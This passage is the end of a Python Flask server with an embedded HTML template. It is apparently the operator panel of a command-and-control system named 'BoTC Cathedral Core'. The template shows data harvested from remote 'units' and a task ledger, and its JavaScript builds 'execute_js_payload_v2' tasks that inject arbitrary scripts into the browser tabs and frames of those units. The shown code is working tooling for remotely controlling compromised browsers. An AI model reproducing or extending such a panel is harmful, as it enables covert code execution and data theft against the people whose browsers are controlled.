                                     style="max-width:90%; max-height:400px; height:auto; border: 1px solid #444; margin-top:5px; display:block;">
                            {% else %}
                                <pre class="botc-pre data-value" style="color: #ff6a00;">Error: Image data (image_data_b64) condition not met.
    Full Parsed Payload for this item (ID: {{item_dict.entry_id}}):
    {{ item_dict.payload_parsed | tojson(indent=2) }}</pre>
                            {% endif %}
                        {% else %}
                            <pre class="botc-pre data-value">{{ item_dict.payload_json | tojson(indent=2) }}</pre>
                        {% endif %}
                    </div>
                {% endfor %}
                </div>
            {% endif %}
        {% else %}
            <p class="text-muted">No offerings of any kind recorded from this unit yet.</p>
        {% endfor %}
    </div>
    <div id="TaskHistory" class="botc-tab-content">
        <h3 class="botc-subheader">Task Ledger (Recent Completed)</h3>
    {% if completed_tasks %}{% for task in completed_tasks %}
        <div class="task-item" style="background-color: {{'#1a2d1a' if task.status=='success' else '#2d1a1a'}};">
        <span>{{ task.action }} (ID: {{task.task_id[:8]}}) - Status: <strong>{{task.status}}</strong> - Updated: {{task.updated_at}}
        {% if task.result_details and task.result_details != '{}' %}<br><small>Result/Details: <pre class="botc-pre" style="display:block;padding:2px 4px;max-height:80px;font-size:0.75em;">{{ task.result_details}}</pre></small>{% endif %}
        </span></div>
    {% endfor %}{% else %}<p class="text-muted">No completed tasks in the recent ledger for this unit.</p>{% endif %}
    </div>
</div>
<script>
function openBoTCTab(evt, tabName) {
  let i, tabcontent, tabbuttons;
  tabcontent = document.getElementsByClassName("botc-tab-content");
  for (i = 0; i < tabcontent.length; i++) { tabcontent[i].style.display = "none"; tabcontent[i].classList.remove("active");}
  tabbuttons = document.getElementsByClassName("botc-tab-button");
  for (i = 0; i < tabbuttons.length; i++) { tabbuttons[i].className = tabbuttons[i].className.replace(" active", "");}
  document.getElementById(tabName).style.display = "block";
  document.getElementById(tabName).classList.add("active");
  if(evt) { evt.currentTarget.className += " active"; } 
  else { const defaultButton = Array.from(tabbuttons).find(btn => btn.getAttribute('onclick').includes(`'\${tabName}'`)); if (defaultButton) defaultButton.classList.add("active"); }
}
function toggleBoTCDirectiveParams() {
  var taskAction = document.getElementById('task_action_select').value;
  var jsParamsDiv = document.getElementById('execute_js_directive_params_div');
  jsParamsDiv.style.display = taskAction === 'execute_js_payload_v2' ? 'block' : 'none';
}
function aggregateJSParams() {
    var taskAction = document.getElementById('task_action_select').value;
    var aggregatedParamsInput = document.getElementById('aggregated_task_params_json');
    if (taskAction === 'execute_js_payload_v2') {
        const params = {
            script_content: document.querySelector('textarea[name="task_params_json_script_content"]').value,
            tab_id: document.querySelector('input[name="task_params_json_tab_id"]').value || 'active',
            all_frames: document.querySelector('input[name="task_params_json_all_frames"]').checked,
            world: document.querySelector('select[name="task_params_json_world"]').value,
            script_args: {} 
        };
        try {
            const argsJsonText = document.querySelector('input[name="task_params_json_script_args"]').value;
            if (argsJsonText.trim()) { params.script_args = JSON.parse(argsJsonText); }
        } catch (e) { alert('Invalid JSON in Script Arguments: ' + e.message + "\\nPlease correct it or leave it empty."); return false; }
        aggregatedParamsInput.value = JSON.stringify(params);
    } else { aggregatedParamsInput.value = '{}'; } // Default for other tasks (like screenshot, which doesn't use this form's params for now)
    return true; 
}
document.addEventListener('DOMContentLoaded', () => { 
    toggleBoTCDirectiveParams(); 
    const initialActiveTabButton = document.querySelector('.botc-tab-button.active');
    if(initialActiveTabButton) { openBoTCTab(null, initialActiveTabButton.getAttribute('onclick').match(/'([^']+)'/)[1]); } 
    else if (document.getElementsByClassName("botc-tab-button").length > 0) { openBoTCTab(null, document.getElementsByClassName("botc-tab-button")[0].getAttribute('onclick').match(/'([^']+)'/)[1]); }
});
</script></body></html>
"""

def create_templates_if_not_exist():
    # (This function can remain the same, or you can remove its call from __main__
    # if you are manually managing the HTML files in the templates/ directory)
    template_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'templates')
    if not os.path.exists(template_dir):
        os.makedirs(template_dir)
        log_cathedral_event('info', f"Created templates directory: {template_dir}")
    dashboard_path = os.path.join(template_dir, 'admin_dashboard.html')
    details_path = os.path.join(template_dir, 'admin_station_details.html')
    if not os.path.exists(dashboard_path):
        with open(dashboard_path, 'w', encoding='utf-8') as f: f.write(BOTC_DASHBOARD_HTML_TEMPLATE)
        log_cathedral_event('info', "BoTC Dashboard scripture inscribed.")
    if not os.path.exists(details_path):
        with open(details_path, 'w', encoding='utf-8') as f: f.write(BOTC_STATION_DETAILS_HTML_TEMPLATE)
        log_cathedral_event('info', "BoTC Unit Interrogation scripture inscribed.")

if __name__ == '__main__':
    dir_path = os.path.dirname(os.path.realpath(__file__))
    db_path = os.path.join(dir_path, DATABASE_FILE)
    print(f"Script __name__ is {__name__}. Attempting to initialize DB at: {db_path}")
    # initialize_cathedral_memory() # Already called globally
    # create_templates_if_not_exist() # Optional: Call if managing templates via Python
    
    log_cathedral_event('info', f"BoTC Cathedral Core (direct run) awakening on http://127.0.0.1:6660{API_BASE_PATH} and Admin UI at http://127.0.0.1:6660/")
    app.run(host='0.0.0.0', port=6660, debug=True) # debug=True is for development